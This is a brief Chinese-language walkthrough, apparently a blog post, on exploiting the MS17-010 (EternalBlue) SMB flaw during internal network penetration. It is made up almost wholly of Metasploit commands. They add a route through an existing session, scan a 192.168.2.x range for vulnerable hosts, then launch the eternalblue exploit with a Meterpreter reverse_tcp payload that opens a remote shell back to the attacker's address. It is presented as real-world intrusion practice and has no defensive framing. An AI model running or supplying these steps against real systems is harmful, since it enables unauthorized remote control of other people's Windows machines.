前言
在内网渗透时,通常挂上代理后。在内网首先会打啵ms17-010。在实战中,使用msf的ms17-010模块,数次没有反弹成功。基于此,到底如何成功利用ms17-010。
ms17_010_eternalblue模块
在msf成功接收session之后,添加路由
run autoroute -p
使用Metasploit的ms17-010相关的模块进行探测是否存在该漏洞
启动Metasploit
msfconsole
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.2.100-200
set threads 3
显示有漏洞
尝试利用漏洞
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set rhost 192.168.2.165
set lhost 192.168.2.117 #自己的ip
run
成功